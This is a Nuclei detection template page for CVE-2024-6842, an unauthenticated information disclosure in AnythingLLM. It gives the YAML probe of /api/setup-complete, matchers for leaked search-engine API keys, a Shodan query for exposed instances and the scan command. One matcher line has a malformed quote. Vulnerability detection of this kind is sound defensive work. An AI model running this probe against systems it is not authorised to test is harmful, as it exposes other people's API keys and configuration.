Skip to content
Nuclei Templates

AnythingLLM - Information Disclosure

ID: CVE-2024-6842

Severity: high

Author: ingbunga,rahaaaiii,asteria121,breakpack,gy741

Tags: cve,cve2024,unauth,exposure,anything-llm,mintplex-Labs

Description

Section titled “Description”

AnythingLLM suffers from an information disclosure vulnerability through the /api/setup-complete API endpoint. By accessing this endpoint, a remote and unauthenticated attacker can access sensitive configuration of the target AnythingLLM instance. This detection is included in the AI and LLM category.

YAML Source

Section titled “YAML Source”
id: CVE-2024-6842


info:
  name: AnythingLLM - Information Disclosure
  author: ingbunga,rahaaaiii,asteria121,breakpack,gy741
  severity: high
  description: |
    AnythingLLM suffers from an information disclosure vulnerability through the `/api/setup-complete` API endpoint. By accessing this endpoint, a remote and unauthenticated attacker can access sensitive configuration of the target AnythingLLM instance. This detection is included in the AI and LLM category.
  impact: |
    An attacker can use the vulnerability to obtain device administrator rights.
  reference:
    - https://huntr.com/bounties/cd911fc7-ac6b-4974-acd0-9cc926fa8d9e
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6842
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-6842
    cwe-id: CWE-200
  metadata:
    max-request: 1
    verified: true
    vendor: Mintplex Labs
    product: anything-llm
    shodan-query: title:"AnythingLLM"
  tags: cve,cve2024,unauth,exposure,anything-llm,mintplex-Labs


http:
  - method: GET
    path:
      - "{{BaseURL}}/api/setup-complete"


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "AuthToken\":true", "ApiKey\":true")'
          - 'contains(header, "application/json")'
          - 'status_code == 200'
        condition: and


      - type: word
        part: body
        words:
          - '"AgentGoogleSearchEngineId":'
          - -"AgentGoogleSearchEngineKey":'
          - '"AgentSerperApiKey":'
          - '"AgentBingSearchApiKey":'
        condition: or
# digest: 490a004630440220287c5b81b9a0e7da1359980f78d70f946254eae98ed77a4e3990e660d7b87fc002202da716060f94bb50b8156193116c06968439c667efefe0a7812a4e0193946f7a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-6842.yaml"

View on Github